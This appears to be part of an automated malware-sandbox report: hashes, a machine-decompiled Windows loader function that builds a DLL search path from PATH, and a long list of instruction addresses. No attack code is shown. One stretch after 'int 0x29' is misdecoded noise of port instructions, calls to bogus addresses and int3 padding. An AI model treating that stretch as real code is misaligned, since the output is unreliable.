                                                                                                • Opcode ID: f5ec35934416c65624cd6d291b8b7633a21fb445553a6a5de79e5b338eea89de
                                                                                                • Instruction ID: ace9779042d81245485966f09db39e3e10360c2b82a75a3dbb31a2a715603654
                                                                                                • Opcode Fuzzy Hash: f5ec35934416c65624cd6d291b8b7633a21fb445553a6a5de79e5b338eea89de
                                                                                                • Instruction Fuzzy Hash: 57518C70A18714CFD7A0CF28C4C492BBBE9FB98644F15996EE99687344D730E844CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E42581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 76%
                                                                                                			E06E42581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t229;
				signed int _t233;
				signed int _t244;
				signed int _t246;
				intOrPtr _t248;
				signed int _t251;
				signed int _t258;
				signed int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr _t276;
				signed int _t278;
				signed int _t280;
				void* _t281;
				signed int _t282;
				unsigned int _t285;
				signed int _t289;
				signed int _t291;
				signed int _t295;
				intOrPtr _t308;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t324;
				signed int _t325;
				void* _t328;
				signed int _t329;
				signed int _t331;
				signed int _t334;
				void* _t335;
				void* _t337;
				void* _t338;

				_t331 = _t334;
				_t335 = _t334 - 0x4c;
				_v8 =  *0x6f0d360 ^ _t331;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t324 = 0x6f0b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t285 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t338 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t276 = 0x48;
				_t305 = 0 | _t338 == 0x00000000;
				_t317 = 0;
				_v37 = _t338 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t276 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t325 = 0xc0000106;
						goto L32;
					} else {
						_t324 = L06E34620(_t285,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t276);
						_v52 = _t324;
						__eflags = _t324;
						if(_t324 == 0) {
							_t325 = 0xc0000017;
							goto L32;
						} else {
							 *(_t324 + 0x44) =  *(_t324 + 0x44) & 0x00000000;
							_t50 = _t324 + 0x48; // 0x48
							_t319 = _t50;
							_t305 = _v32;
							 *((intOrPtr*)(_t324 + 0x3c)) = _t276;
							_t278 = 0;
							 *((short*)(_t324 + 0x30)) = _v48;
							__eflags = _t305;
							if(_t305 != 0) {
								 *(_t324 + 0x18) = _t319;
								__eflags = _t305 - 0x6f08478;
								 *_t324 = ((0 | _t305 == 0x06f08478) - 0x00000001 & 0xfffffffb) + 7;
								E06E5F3E0(_t319,  *((intOrPtr*)(_t305 + 4)),  *_t305 & 0x0000ffff);
								_t305 = _v32;
								_t335 = _t335 + 0xc;
								_t278 = 1;
								__eflags = _a8;
								_t319 = _t319 + (( *_t305 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t269 = E06EA39F2(_t319);
									_t305 = _v32;
									_t319 = _t269;
								}
							}
							_t289 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t325 = _v68;
								__eflags = 0;
								 *((short*)(_t319 - 2)) = 0;
								goto L32;
							} else {
								_t280 = _t324 + _t278 * 4;
								_v56 = _t280;
								do {
									__eflags = _t305;
									if(_t305 != 0) {
										_t229 =  *(_v60 + _t289 * 4);
										__eflags = _t229;
										if(_t229 == 0) {
											goto L30;
										} else {
											__eflags = _t229 == 5;
											if(_t229 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t280 =  *(_v60 + _t289 * 4);
										 *(_t280 + 0x18) = _t319;
										_t233 =  *(_v60 + _t289 * 4);
										__eflags = _t233 - 8;
										if(_t233 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t233 * 4 +  &M06E42959))) {
												case 0:
													__ax =  *0x6f08488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E06E5F3E0(__edi,  *0x6f0848c, __ax & 0x0000ffff);
														__eax =  *0x6f08488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E06E5F3E0(_t319, _v80, _v64);
													_t264 = _v64;
													goto L26;
												case 2:
													 *0x6f08480 & 0x0000ffff = E06E5F3E0(__edi,  *0x6f08484,  *0x6f08480 & 0x0000ffff);
													__eax =  *0x6f08480 & 0x0000ffff;
													__eax = ( *0x6f08480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E06E5F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E06E5F3E0(_t319, _v76, _v36);
														_t264 = _v36;
													}
													L26:
													_t335 = _t335 + 0xc;
													_t319 = _t319 + (_t264 >> 1) * 2 + 2;
													__eflags = _t319;
													L27:
													_push(0x3b);
													_pop(_t266);
													 *((short*)(_t319 - 2)) = _t266;
													goto L28;
												case 6:
													__ebx =  *0x6f0575c;
													__eflags = __ebx - 0x6f0575c;
													if(__ebx != 0x6f0575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E06E5F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x6f0575c;
														} while (__ebx != 0x6f0575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x6f08478 & 0x0000ffff = E06E5F3E0(__edi,  *0x6f0847c,  *0x6f08478 & 0x0000ffff);
													__eax =  *0x6f08478 & 0x0000ffff;
													__eax = ( *0x6f08478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E06EA39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x6f06e58 & 0x0000ffff = E06E5F3E0(__edi,  *0x6f06e5c,  *0x6f06e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x6f06e58 & 0x0000ffff;
													__eax = ( *0x6f06e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t289 = _v16;
													_t305 = _v32;
													L29:
													_t280 = _t280 + 4;
													__eflags = _t280;
													_v56 = _t280;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t289 = _t289 + 1;
									_v16 = _t289;
									__eflags = _t289 - _v48;
								} while (_t289 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t271 =  *(_v60 + _t317 * 4);
						if(_t271 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t271 * 4 +  &M06E42935))) {
							case 0:
								__ax =  *0x6f08488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t305 =  &_v64;
								_v80 = E06E42E3E(0,  &_v64);
								_t276 = _t276 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x6f08480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x6f08480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E06E2EEF0(0x6f079a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E06E2EB70(__ecx, 0x6f079a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t207 = _v72;
											__eflags = _t207;
											if(_t207 != 0) {
												L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t207);
											}
											_t208 = _v52;
											__eflags = _t208;
											if(_t208 != 0) {
												__eflags = _t325;
												if(_t325 < 0) {
													L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
													_t208 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t285 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x6f07b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E06E2EB70(__ecx, 0x6f079a0);
										__eax = _v52;
										L36:
										_pop(_t318);
										_pop(_t326);
										__eflags = _v8 ^ _t331;
										_pop(_t277);
										return E06E5B640(_t208, _t277, _v8 ^ _t331, _t305, _t318, _t326);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t272 = _v56;
								if(_v56 != 0) {
									_t305 =  &_v36;
									_t274 = E06E42E3E(_t272,  &_v36);
									_t285 = _v36;
									_v76 = _t274;
								}
								if(_t285 == 0) {
									goto L44;
								} else {
									_t276 = _t276 + 2 + _t285;
								}
								goto L14;
							case 6:
								__eax =  *0x6f05764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x6f08478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x6f08478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x6f06e58 & 0x0000ffff;
								__eax = ( *0x6f06e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t317 = _t317 + 1;
								if(_t317 >= _v48) {
									goto L16;
								} else {
									_t305 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("in al, 0x6");
					asm("o16 sub ah, ah");
					asm("loopne 0x29");
					asm("in al, 0x6");
					asm("in al, 0x6");
					_t281 = es;
					0xeb0cbd5a(es, 0x25);
					_t337 = 0;
					 *0x1D000C7D =  *((char*)(0x1d000c7d)) - 0xe4;
					asm("in al, 0x6");
					_t328 = _t324 + 1 - 1;
					asm("daa");
					asm("in al, 0x6");
					asm("fcomp dword [ebx-0x18]");
					asm("in al, 0x6");
					0xd3b0f586(es, es, es, ds, es, es, es);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x6eeff00);
					E06E6D08C(_t281, _t319, _t328);
					_v44 =  *[fs:0x18];
					_t320 = 0;
					 *_a24 = 0;
					_t282 = _a12;
					__eflags = _t282;
					if(_t282 == 0) {
						_t244 = 0xc0000100;
					} else {
						_v8 = 0;
						_t329 = 0xc0000100;
						_v52 = 0xc0000100;
						_t246 = 4;
						while(1) {
							_v40 = _t246;
							__eflags = _t246;
							if(_t246 == 0) {
								break;
							}
							_t295 = _t246 * 0xc;
							_v48 = _t295;
							__eflags = _t282 -  *((intOrPtr*)(_t295 + 0x6df1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t261 = E06E5E5C0(_a8,  *((intOrPtr*)(_t295 + 0x6df1668)), _t282);
									_t337 = _t337 + 0xc;
									__eflags = _t261;
									if(__eflags == 0) {
										_t329 = E06E951BE(_t282,  *((intOrPtr*)(_v48 + 0x6df166c)), _a16, _t320, _t329, __eflags, _a20, _a24);
										_v52 = _t329;
										break;
									} else {
										_t246 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t246 = _t246 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t329;
						__eflags = _t329;
						if(_t329 < 0) {
							__eflags = _t329 - 0xc0000100;
							if(_t329 == 0xc0000100) {
								_t291 = _a4;
								__eflags = _t291;
								if(_t291 != 0) {
									_v36 = _t291;
									__eflags =  *_t291 - _t320;
									if( *_t291 == _t320) {
										_t329 = 0xc0000100;
										goto L76;
									} else {
										_t308 =  *((intOrPtr*)(_v44 + 0x30));
										_t248 =  *((intOrPtr*)(_t308 + 0x10));
										__eflags =  *((intOrPtr*)(_t248 + 0x48)) - _t291;
										if( *((intOrPtr*)(_t248 + 0x48)) == _t291) {
											__eflags =  *(_t308 + 0x1c);
											if( *(_t308 + 0x1c) == 0) {
												L106:
												_t329 = E06E42AE4( &_v36, _a8, _t282, _a16, _a20, _a24);
												_v32 = _t329;
												__eflags = _t329 - 0xc0000100;
												if(_t329 != 0xc0000100) {
													goto L69;
												} else {
													_t320 = 1;
													_t291 = _v36;
													goto L75;
												}
											} else {
												_t251 = E06E26600( *(_t308 + 0x1c));
												__eflags = _t251;
												if(_t251 != 0) {
													goto L106;
												} else {
													_t291 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t329 = E06E42C50(_t291, _a8, _t282, _a16, _a20, _a24, _t320);
											L76:
											_v32 = _t329;
											goto L69;
										}
									}
									goto L108;
								} else {
									E06E2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t329 = _a24;
									_t258 = E06E42AE4( &_v36, _a8, _t282, _a16, _a20, _t329);
									_v32 = _t258;
									__eflags = _t258 - 0xc0000100;
									if(_t258 == 0xc0000100) {
										_v32 = E06E42C50(_v36, _a8, _t282, _a16, _a20, _t329, 1);
									}
									_v8 = _t320;
									E06E42ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t244 = _t329;
					}
					L70:
					return E06E6D0D1(_t244);
				}
				L108:
			}





















































                                                                                                0x06e42584
                                                                                                0x06e42586
                                                                                                0x06e42590
                                                                                                0x06e42596
                                                                                                0x06e42597
                                                                                                0x06e42598
                                                                                                0x06e42599
                                                                                                0x06e4259e
                                                                                                0x06e425a4
                                                                                                0x06e425a9
                                                                                                0x06e425ac
                                                                                                0x06e425ae
                                                                                                0x06e425b1
                                                                                                0x06e425b2
                                                                                                0x06e425b5
                                                                                                0x06e425b8
                                                                                                0x06e425bb
                                                                                                0x06e425bc
                                                                                                0x06e425bf
                                                                                                0x06e425c2
                                                                                                0x06e425c5
                                                                                                0x06e425c6
                                                                                                0x06e425cb
                                                                                                0x06e425ce
                                                                                                0x06e425d8
                                                                                                0x06e425db
                                                                                                0x06e425dd
                                                                                                0x06e425de
                                                                                                0x06e425e1
                                                                                                0x06e425e3
                                                                                                0x06e425e9
                                                                                                0x06e426da
                                                                                                0x06e426da
                                                                                                0x06e426dd
                                                                                                0x06e426e2
                                                                                                0x06e85b56
                                                                                                0x00000000
                                                                                                0x06e426e8
                                                                                                0x06e426f9
                                                                                                0x06e426fb
                                                                                                0x06e426fe
                                                                                                0x06e42700
                                                                                                0x06e85b60
                                                                                                0x00000000
                                                                                                0x06e42706
                                                                                                0x06e42706
                                                                                                0x06e4270a
                                                                                                0x06e4270a
                                                                                                0x06e4270d
                                                                                                0x06e42713
                                                                                                0x06e42716
                                                                                                0x06e42718
                                                                                                0x06e4271c
                                                                                                0x06e4271e
                                                                                                0x06e85b6c
                                                                                                0x06e85b6f
                                                                                                0x06e85b7f
                                                                                                0x06e85b89
                                                                                                0x06e85b8e
                                                                                                0x06e85b93
                                                                                                0x06e85b96
                                                                                                0x06e85b9c
                                                                                                0x06e85ba0
                                                                                                0x06e85ba3
                                                                                                0x06e85bab
                                                                                                0x06e85bb0
                                                                                                0x06e85bb3
                                                                                                0x06e85bb3
                                                                                                0x06e85ba3
                                                                                                0x06e42724
                                                                                                0x06e42726
                                                                                                0x06e42729
                                                                                                0x06e4272c
                                                                                                0x06e4279d
                                                                                                0x06e4279d
                                                                                                0x06e427a0
                                                                                                0x06e427a2
                                                                                                0x00000000
                                                                                                0x06e4272e
                                                                                                0x06e4272e
                                                                                                0x06e42731
                                                                                                0x06e42734
                                                                                                0x06e42734
                                                                                                0x06e42736
                                                                                                0x06e85bc1
                                                                                                0x06e85bc1
                                                                                                0x06e85bc4
                                                                                                0x00000000
                                                                                                0x06e85bca
                                                                                                0x06e85bca
                                                                                                0x06e85bcd
                                                                                                0x00000000
                                                                                                0x06e85bd3
                                                                                                0x00000000
                                                                                                0x06e85bd3
                                                                                                0x06e85bcd
                                                                                                0x06e4273c
                                                                                                0x06e4273c
                                                                                                0x06e42742
                                                                                                0x06e42747
                                                                                                0x06e4274a
                                                                                                0x06e4274d
                                                                                                0x06e42750
                                                                                                0x00000000
                                                                                                0x06e42756
                                                                                                0x06e42756
                                                                                                0x00000000
                                                                                                0x06e42902
                                                                                                0x06e42908
                                                                                                0x06e4290b
                                                                                                0x00000000
                                                                                                0x06e42911
                                                                                                0x06e4291c
                                                                                                0x06e42921
                                                                                                0x00000000
                                                                                                0x06e42921
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42880
                                                                                                0x06e42887
                                                                                                0x06e4288c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42805
                                                                                                0x06e4280a
                                                                                                0x06e42814
                                                                                                0x06e42816
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e4281e
                                                                                                0x06e42821
                                                                                                0x06e42823
                                                                                                0x00000000
                                                                                                0x06e42829
                                                                                                0x06e42829
                                                                                                0x06e42831
                                                                                                0x06e4283c
                                                                                                0x06e4283e
                                                                                                0x00000000
                                                                                                0x06e4283e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e4284e
                                                                                                0x06e42850
                                                                                                0x06e42851
                                                                                                0x06e42854
                                                                                                0x06e42857
                                                                                                0x06e4285a
                                                                                                0x06e4285c
                                                                                                0x06e4285d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e4275d
                                                                                                0x06e42761
                                                                                                0x00000000
                                                                                                0x06e42767
                                                                                                0x06e4276e
                                                                                                0x06e42773
                                                                                                0x06e42773
                                                                                                0x06e42776
                                                                                                0x06e42778
                                                                                                0x06e4277e
                                                                                                0x06e4277e
                                                                                                0x06e42781
                                                                                                0x06e42781
                                                                                                0x06e42783
                                                                                                0x06e42784
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e85bd8
                                                                                                0x06e85bde
                                                                                                0x06e85be4
                                                                                                0x06e85be6
                                                                                                0x06e85be8
                                                                                                0x06e85be9
                                                                                                0x06e85bee
                                                                                                0x06e85bf8
                                                                                                0x06e85bff
                                                                                                0x06e85c01
                                                                                                0x06e85c04
                                                                                                0x06e85c07
                                                                                                0x06e85c0b
                                                                                                0x06e85c0d
                                                                                                0x06e85c0d
                                                                                                0x06e85c15
                                                                                                0x06e85c18
                                                                                                0x06e85c1b
                                                                                                0x06e85c1b
                                                                                                0x06e85c1e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e428c3
                                                                                                0x06e428c8
                                                                                                0x06e428d2
                                                                                                0x06e428d4
                                                                                                0x06e428d8
                                                                                                0x06e428db
                                                                                                0x06e85c26
                                                                                                0x06e85c28
                                                                                                0x06e85c2d
                                                                                                0x06e85c2d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e85c34
                                                                                                0x06e85c36
                                                                                                0x06e85c49
                                                                                                0x06e85c4e
                                                                                                0x06e85c54
                                                                                                0x06e85c5b
                                                                                                0x06e85c5d
                                                                                                0x06e85c60
                                                                                                0x06e42788
                                                                                                0x06e42788
                                                                                                0x06e4278b
                                                                                                0x06e4278e
                                                                                                0x06e4278e
                                                                                                0x06e4278e
                                                                                                0x06e42791
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42756
                                                                                                0x06e42750
                                                                                                0x00000000
                                                                                                0x06e42794
                                                                                                0x06e42794
                                                                                                0x06e42795
                                                                                                0x06e42798
                                                                                                0x06e42798
                                                                                                0x00000000
                                                                                                0x06e42734
                                                                                                0x06e4272c
                                                                                                0x06e42700
                                                                                                0x06e425ef
                                                                                                0x06e425ef
                                                                                                0x06e425ef
                                                                                                0x06e425f2
                                                                                                0x06e425f8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e425fe
                                                                                                0x00000000
                                                                                                0x06e428e6
                                                                                                0x06e428ec
                                                                                                0x06e428ef
                                                                                                0x06e428f5
                                                                                                0x06e428f8
                                                                                                0x06e428f8
                                                                                                0x00000000
                                                                                                0x06e428f8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42866
                                                                                                0x06e42866
                                                                                                0x06e42876
                                                                                                0x06e42879
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e427e0
                                                                                                0x06e427e7
                                                                                                0x06e427e9
                                                                                                0x06e427eb
                                                                                                0x06e85afd
                                                                                                0x00000000
                                                                                                0x06e85afd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42633
                                                                                                0x06e42638
                                                                                                0x06e4263b
                                                                                                0x06e4263c
                                                                                                0x06e4263e
                                                                                                0x06e42640
                                                                                                0x06e42642
                                                                                                0x06e42647
                                                                                                0x06e42649
                                                                                                0x06e4264e
                                                                                                0x06e42650
                                                                                                0x06e42653
                                                                                                0x06e42659
                                                                                                0x06e426a2
                                                                                                0x06e426a7
                                                                                                0x06e426ac
                                                                                                0x06e426b2
                                                                                                0x06e85b11
                                                                                                0x06e85b15
                                                                                                0x06e85b17
                                                                                                0x00000000
                                                                                                0x06e426b8
                                                                                                0x06e426b8
                                                                                                0x06e426ba
                                                                                                0x06e427a6
                                                                                                0x06e427a6
                                                                                                0x06e427a9
                                                                                                0x06e427ab
                                                                                                0x06e427b9
                                                                                                0x06e427b9
                                                                                                0x06e427be
                                                                                                0x06e427c1
                                                                                                0x06e427c3
                                                                                                0x06e427c5
                                                                                                0x06e427c7
                                                                                                0x06e85c74
                                                                                                0x06e85c79
                                                                                                0x06e85c79
                                                                                                0x06e427c7
                                                                                                0x00000000
                                                                                                0x06e426c0
                                                                                                0x06e426c0
                                                                                                0x06e426c3
                                                                                                0x06e426c6
                                                                                                0x06e426c6
                                                                                                0x06e426c9
                                                                                                0x06e426c9
                                                                                                0x00000000
                                                                                                0x06e426c9
                                                                                                0x06e426ba
                                                                                                0x06e4265b
                                                                                                0x06e4265b
                                                                                                0x06e4265e
                                                                                                0x06e42667
                                                                                                0x06e4266d
                                                                                                0x06e42677
                                                                                                0x06e4267c
                                                                                                0x06e4267f
                                                                                                0x06e42681
                                                                                                0x06e85b49
                                                                                                0x06e85b4e
                                                                                                0x06e427cd
                                                                                                0x06e427d0
                                                                                                0x06e427d1
                                                                                                0x06e427d2
                                                                                                0x06e427d4
                                                                                                0x06e427dd
                                                                                                0x06e42687
                                                                                                0x06e42687
                                                                                                0x06e4268a
                                                                                                0x06e4268b
                                                                                                0x06e4268e
                                                                                                0x06e4268f
                                                                                                0x06e42691
                                                                                                0x06e42696
                                                                                                0x06e42698
                                                                                                0x06e4269d
                                                                                                0x06e4269f
                                                                                                0x00000000
                                                                                                0x06e4269f
                                                                                                0x06e42681
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42846
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42605
                                                                                                0x06e4260a
                                                                                                0x06e4260c
                                                                                                0x06e42611
                                                                                                0x06e42616
                                                                                                0x06e42619
                                                                                                0x06e42619
                                                                                                0x06e4261e
                                                                                                0x00000000
                                                                                                0x06e42624
                                                                                                0x06e42627
                                                                                                0x06e42627
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e85b1f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42894
                                                                                                0x06e4289b
                                                                                                0x06e4289d
                                                                                                0x06e428a1
                                                                                                0x06e85b2b
                                                                                                0x06e85b2e
                                                                                                0x06e85b2e
                                                                                                0x06e428a7
                                                                                                0x06e428a9
                                                                                                0x06e85b04
                                                                                                0x06e85b09
                                                                                                0x06e85b09
                                                                                                0x06e85b09
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e85b35
                                                                                                0x06e85b3c
                                                                                                0x06e428fb
                                                                                                0x06e428fb
                                                                                                0x06e426cc
                                                                                                0x06e426cc
                                                                                                0x06e426d0
                                                                                                0x00000000
                                                                                                0x06e426d2
                                                                                                0x06e426d2
                                                                                                0x00000000
                                                                                                0x06e426d2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e425fe
                                                                                                0x06e4292d
                                                                                                0x06e42930
                                                                                                0x06e42935
                                                                                                0x06e42937
                                                                                                0x06e42939
                                                                                                0x06e4293d
                                                                                                0x06e4293f
                                                                                                0x06e42941
                                                                                                0x06e4294e
                                                                                                0x06e4294f
                                                                                                0x06e4295a
                                                                                                0x06e4295d
                                                                                                0x06e42963
                                                                                                0x06e42969
                                                                                                0x06e4296e
                                                                                                0x06e4296f
                                                                                                0x06e42971
                                                                                                0x06e42977
                                                                                                0x06e4297b
                                                                                                0x06e42980
                                                                                                0x06e42981
                                                                                                0x06e42982
                                                                                                0x06e42983
                                                                                                0x06e42984
                                                                                                0x06e42985
                                                                                                0x06e42986
                                                                                                0x06e42987
                                                                                                0x06e42988
                                                                                                0x06e42989
                                                                                                0x06e4298a
                                                                                                0x06e4298b
                                                                                                0x06e4298c
                                                                                                0x06e4298d
                                                                                                0x06e4298e
                                                                                                0x06e4298f
                                                                                                0x06e42990
                                                                                                0x06e42992
                                                                                                0x06e42997
                                                                                                0x06e429a3
                                                                                                0x06e429a6
                                                                                                0x06e429ab
                                                                                                0x06e429ad
                                                                                                0x06e429b0
                                                                                                0x06e429b2
                                                                                                0x06e85c80
                                                                                                0x06e429b8
                                                                                                0x06e429b8
                                                                                                0x06e429bb
                                                                                                0x06e429c0
                                                                                                0x06e429c5
                                                                                                0x06e429c6
                                                                                                0x06e429c6
                                                                                                0x06e429c9
                                                                                                0x06e429cb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e429cd
                                                                                                0x06e429d0
                                                                                                0x06e429d9
                                                                                                0x06e429db
                                                                                                0x06e429dd
                                                                                                0x06e42a7f
                                                                                                0x06e42a84
                                                                                                0x06e42a87
                                                                                                0x06e42a89
                                                                                                0x06e85ca1
                                                                                                0x06e85ca3
                                                                                                0x00000000
                                                                                                0x06e42a8f
                                                                                                0x06e42a8f
                                                                                                0x00000000
                                                                                                0x06e42a8f
                                                                                                0x00000000
                                                                                                0x06e429e3
                                                                                                0x06e429e3
                                                                                                0x06e429e3
                                                                                                0x00000000
                                                                                                0x06e429e3
                                                                                                0x06e429dd
                                                                                                0x00000000
                                                                                                0x06e429db
                                                                                                0x06e429e6
                                                                                                0x06e429e9
                                                                                                0x06e429eb
                                                                                                0x06e429ed
                                                                                                0x06e429f3
                                                                                                0x06e429f5
                                                                                                0x06e429f8
                                                                                                0x06e429fa
                                                                                                0x06e42a97
                                                                                                0x06e42a9a
                                                                                                0x06e42a9d
                                                                                                0x06e42add
                                                                                                0x00000000
                                                                                                0x06e42a9f
                                                                                                0x06e42aa2
                                                                                                0x06e42aa5
                                                                                                0x06e42aa8
                                                                                                0x06e42aab
                                                                                                0x06e85cab
                                                                                                0x06e85caf
                                                                                                0x06e85cc5
                                                                                                0x06e85cda
                                                                                                0x06e85cdc
                                                                                                0x06e85cdf
                                                                                                0x06e85ce5
                                                                                                0x00000000
                                                                                                0x06e85ceb
                                                                                                0x06e85ced
